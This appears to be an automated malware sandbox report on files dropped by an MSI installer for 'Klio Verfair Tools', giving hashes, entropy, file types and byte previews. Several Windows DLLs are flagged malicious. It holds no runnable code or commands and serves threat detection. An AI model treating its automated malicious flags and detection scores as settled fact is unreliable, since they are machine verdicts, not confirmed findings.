                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {5573CB6A-FBB7-4DDB-BB6F-286B726CF22B}, Number of Words: 10, Subject: Klio Verfair Tools, Author: TasovCoop, Name of Creating Application: Klio Verfair Tools, Template: ;1033, Comments: This installer database contains the logic and data required to install Klio Verfair Tools., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Mar 23 16:43:52 2025, Last Saved Time/Date: Sun Mar 23 16:43:52 2025, Last Printed: Sun Mar 23 16:43:52 2025, Number of Pages: 450
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65046016
                                                                                                                                                                                          Entropy (8bit):7.31982440208669
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:
                                                                                                                                                                                          MD5:CC9A4FBBBABAD106E40B7577F6DBBCC1
                                                                                                                                                                                          SHA1:4EDF9195188E721A7B5F394032DDB987144F918E
                                                                                                                                                                                          SHA-256:0B268732E81427C10AFAA9679C60485A5C8A71C839F268B6E0E0D7C57EFB3832
                                                                                                                                                                                          SHA-512:059A987598CD67F4603CCDB1721E136890BC07DA30527105E0A86BBF68BB657F1C9C32539E29D09524CB804496FD925931AA2EFCF8A7D373F1EF71318C4546BC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:......................>............................................#..................................................................z...............................................................................................g...............................................................................c...d...e...f...g...h...i.... ... ... ... ..."..."...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#..............f.......................:...........9........................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...8.../...0...1...2...3...4...5...6...7.......;...C...N...<...=...>...?...@...A...B...F...D...E...L...G...H...I...J...K...Z...M...O...P...g...Q...R...S...T...U...V...W...X...Y...........\...]...^..._...`...a...b...c...d...e...........h...i...j...k...l...m...n...o...p...q...r...s...t.......v...w...x...y...z...
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {5573CB6A-FBB7-4DDB-BB6F-286B726CF22B}, Number of Words: 10, Subject: Klio Verfair Tools, Author: TasovCoop, Name of Creating Application: Klio Verfair Tools, Template: ;1033, Comments: This installer database contains the logic and data required to install Klio Verfair Tools., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Mar 23 16:43:52 2025, Last Saved Time/Date: Sun Mar 23 16:43:52 2025, Last Printed: Sun Mar 23 16:43:52 2025, Number of Pages: 450
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65046016
                                                                                                                                                                                          Entropy (8bit):7.31982440208669
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:
                                                                                                                                                                                          MD5:CC9A4FBBBABAD106E40B7577F6DBBCC1
                                                                                                                                                                                          SHA1:4EDF9195188E721A7B5F394032DDB987144F918E
                                                                                                                                                                                          SHA-256:0B268732E81427C10AFAA9679C60485A5C8A71C839F268B6E0E0D7C57EFB3832
                                                                                                                                                                                          SHA-512:059A987598CD67F4603CCDB1721E136890BC07DA30527105E0A86BBF68BB657F1C9C32539E29D09524CB804496FD925931AA2EFCF8A7D373F1EF71318C4546BC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:......................>............................................#..................................................................z...............................................................................................g...............................................................................c...d...e...f...g...h...i.... ... ... ... ..."..."...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#...#..............f.......................:...........9........................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...8.../...0...1...2...3...4...5...6...7.......;...C...N...<...=...>...?...@...A...B...F...D...E...L...G...H...I...J...K...Z...M...O...P...g...Q...R...S...T...U...V...W...X...Y...........\...]...^..._...`...a...b...c...d...e...........h...i...j...k...l...m...n...o...p...q...r...s...t.......v...w...x...y...z...
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):1021792
                                                                                                                                                                                          Entropy (8bit):6.608727172078022
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                                                                                                                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                                                                                                                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                                                                                                                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                                                                                                                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1021792
                                                                                                                                                                                          Entropy (8bit):6.608727172078022
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                                                                                                                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                                                                                                                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                                                                                                                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                                                                                                                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1021792
                                                                                                                                                                                          Entropy (8bit):6.608727172078022
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                                                                                                                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                                                                                                                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                                                                                                                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                                                                                                                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1021792
                                                                                                                                                                                          Entropy (8bit):6.608727172078022
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                                                                                                                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                                                                                                                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                                                                                                                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                                                                                                                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):380520
                                                                                                                                                                                          Entropy (8bit):6.512348002260683
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:ZSXJmYiFGLzkhEFeCPGi5B8dZ6t+6bUSfcqKgAST:ZSXJ9khElPGvcttbxpAST
                                                                                                                                                                                          MD5:FFDAACB43C074A8CB9A608C612D7540B
                                                                                                                                                                                          SHA1:8F054A7F77853DE365A7763D93933660E6E1A890
                                                                                                                                                                                          SHA-256:7484797EA4480BC71509FA28B16E607F82323E05C44F59FFA65DB3826ED1B388
                                                                                                                                                                                          SHA-512:A9BD31377F7A6ECF75B1D90648847CB83D8BD65AD0B408C4F8DE6EB50764EEF1402E7ACDFF375B7C3B07AC9F94184BD399A10A22418DB474908B5E7A1ADFE263
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^..?{..?{..?{..x..?{..~..?{...x..?{......?{...~..?{.....?{..z..?{..?z..>{..r..?{..{..?{....?{..?.?{..y..?{.Rich.?{.........PE..L...>.$g.........."!...)..................... .......................................'....@A........................@3..X....3.......... ...............h:.......6..@...p...............................@............ ..(............................text...J........................... ..`.rdata...$... ...&..................@..@.data....!...P......................@....fptable.............@..............@....rsrc... ............B..............@..@.reloc...6.......8...\..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1021792
                                                                                                                                                                                          Entropy (8bit):6.608727172078022
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                                                                                                                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                                                                                                                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                                                                                                                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                                                                                                                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):561652
                                                                                                                                                                                          Entropy (8bit):4.423935630223455
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:+AVWno2eoqXRy8QGSi6H0NOJe6ay1lrnyoeFM8UuPLZoELS/8taek6KYrOzzCIhS:fCANx6xPZX9mBdH
                                                                                                                                                                                          MD5:4809AA92785877A22D3B8A9A9DB2B5B1
                                                                                                                                                                                          SHA1:9A02687DC039A8262D0424EA0BB80806A676F0E1
                                                                                                                                                                                          SHA-256:F3DEB8B5166A652A918B4946F84EF8406D331F06615D51D6C770E47FF3CC6BBC
                                                                                                                                                                                          SHA-512:5936EF5E4C76840015C8B2656151876E5661032B8F83C33711B41E48AA4F594D5CD3B00232814131679F0422AE4209132A2A2341E8BD7A15130BA86C92D2B1D7
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:...@IXOS.@.....@:.yZ.@.....@.....@.....@.....@.....@......&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}..Klio Verfair Tools..build.msi.@.....@.....@.....@......icon_23.exe..&.{5573CB6A-FBB7-4DDB-BB6F-286B726CF22B}.....@.....@.....@.....@.......@.....@.....@.......@......Klio Verfair Tools......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@,....@.....@.]....&.{7D0977D7-319F-41E6-AC22-4C628AFB5366}=.C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\.@.......@.....@.....@......&.{00541E92-B30A-43FA-9AD1-62A7BF8D6B85}1.01:\Software\TasovCoop\Klio Verfair Tools\Version.@.......@.....@.....@......&.{0A71947E-5499-4B27-8695-F2466C030D57}C.C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll.@.......@.....@.....@......&.{40974B72-6EF2-4796-AFED-87826DA707E4}C.C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe.@.......@.....@.....@......&.{F4E863DB
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                          Entropy (8bit):1.1621392096715766
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:JSbX72Fj9AGiLIlHVRpMh/7777777777777777777777777vDHFcOaPip3Xl0i8Q:JbQI5cCY6F
                                                                                                                                                                                          MD5:85DD879E5C97400565B3EA77E646521D
                                                                                                                                                                                          SHA1:85BBC6C87AC977289D5A7F3EE6986659E3C350F1
                                                                                                                                                                                          SHA-256:06DFB1D665148574C856C1E9930CA85E39D47E6F1D3320F048C189CE1AEB53E3
                                                                                                                                                                                          SHA-512:E6AFCA30342CB44232AF636CCB0CC286CE8D55CE648784845960C966C73377E8EF05BBCFDD86BD7D2308D4FDDF5E5787148FAD77E736EFC95E60D5285655C56B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                          Entropy (8bit):1.5509684898091587
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:M8PhquRc06WXJ8jT5+tiJAAErCy6mSRvmySROT74Ba:jhq1fjTwYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:ED0C0936EE47E3E1B948915C94CE0A5A
                                                                                                                                                                                          SHA1:3C8E9205594295088B065FB30FCE74BB7D701423
                                                                                                                                                                                          SHA-256:763BD8FB55321BB49E5A7023FDE57BA879E4E39B6E21D0D3727CF08D3E0711FC
                                                                                                                                                                                          SHA-512:B7C91D781D98E78E1DDA47BB0790749E99F0567DD12AAC664829EF882E385ACA7D127894A22738BA30760A22D7B10D9AB0E927F40D09BB9681D80049F068B56C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):364484
                                                                                                                                                                                          Entropy (8bit):5.365502104144754
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauF:zTtbmkExhMJCIpEa
                                                                                                                                                                                          MD5:4FFC1ADDFB2F4D0F4624C639DDFBA731
                                                                                                                                                                                          SHA1:136E3638E75D17B5A64DE4649D62724741954032
                                                                                                                                                                                          SHA-256:20DF5DFEA9FDA5A22C64707838AF5F9D0065AC318C69860320B89D37BE3C298B
                                                                                                                                                                                          SHA-512:07EA8A51615A95047B7AAA21DC971581DC18AA248CABBFF0715585AE0E4E9DF471716F38AABD5D115F89F70ACDD701B9810D573B0E2E0D958106FD0736B02B8B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):73728
                                                                                                                                                                                          Entropy (8bit):0.13277127836030628
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:vOwwblnacClOTx0WlyipV0WlY0WlAAEV0yjCymlmipV0WlvVQwGesz+KDx:CBalOTtySROAAErCy6mSRva/x
                                                                                                                                                                                          MD5:4A1D13066BAAA758561EA807B6DDAD33
                                                                                                                                                                                          SHA1:FB53C8404961F46ABA6064C5D3B7B22D792F39FB
                                                                                                                                                                                          SHA-256:597FC75B2D11C60BF4C4150DC80858368ED954AB72B4FD50DB4ED2402CFF6E45
                                                                                                                                                                                          SHA-512:DD47CC608A14117B21527D5F3ACC92E759BD85DDFB7F2C6337F7D14B75DC65364C015D5D8A48409C2B120E4AF7A0AD59F296FBDA708340A8C5036D23FB572103
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):1.2441380912920412
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:sjiukSI+CFXJXT5WtiJAAErCy6mSRvmySROT74Ba:WiFvTYYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:F9983A9EC8396C9981CF57BD86D4EA78
                                                                                                                                                                                          SHA1:F97BB58F3F5D64856A95DEBD893CECC45B4F48A8
                                                                                                                                                                                          SHA-256:694C61341DAAE8CFAA0B2976FF9D2C5C1ED659D53F6AA9AB2D4307199EF66E99
                                                                                                                                                                                          SHA-512:10DC57DA4A8A579B77F555F1504C1AE4A7A689663B848E5F059B3EE39E43513F0FB2569BC5F38BE099A92C4A5AA06964A2A50AA1ADBF16F204FC41501AA75628
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):1.2441380912920412
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:sjiukSI+CFXJXT5WtiJAAErCy6mSRvmySROT74Ba:WiFvTYYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:F9983A9EC8396C9981CF57BD86D4EA78
                                                                                                                                                                                          SHA1:F97BB58F3F5D64856A95DEBD893CECC45B4F48A8
                                                                                                                                                                                          SHA-256:694C61341DAAE8CFAA0B2976FF9D2C5C1ED659D53F6AA9AB2D4307199EF66E99
                                                                                                                                                                                          SHA-512:10DC57DA4A8A579B77F555F1504C1AE4A7A689663B848E5F059B3EE39E43513F0FB2569BC5F38BE099A92C4A5AA06964A2A50AA1ADBF16F204FC41501AA75628
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                          Entropy (8bit):1.5509684898091587
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:M8PhquRc06WXJ8jT5+tiJAAErCy6mSRvmySROT74Ba:jhq1fjTwYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:ED0C0936EE47E3E1B948915C94CE0A5A
                                                                                                                                                                                          SHA1:3C8E9205594295088B065FB30FCE74BB7D701423
                                                                                                                                                                                          SHA-256:763BD8FB55321BB49E5A7023FDE57BA879E4E39B6E21D0D3727CF08D3E0711FC
                                                                                                                                                                                          SHA-512:B7C91D781D98E78E1DDA47BB0790749E99F0567DD12AAC664829EF882E385ACA7D127894A22738BA30760A22D7B10D9AB0E927F40D09BB9681D80049F068B56C
                                                                                                                                                                                          Malicious:false
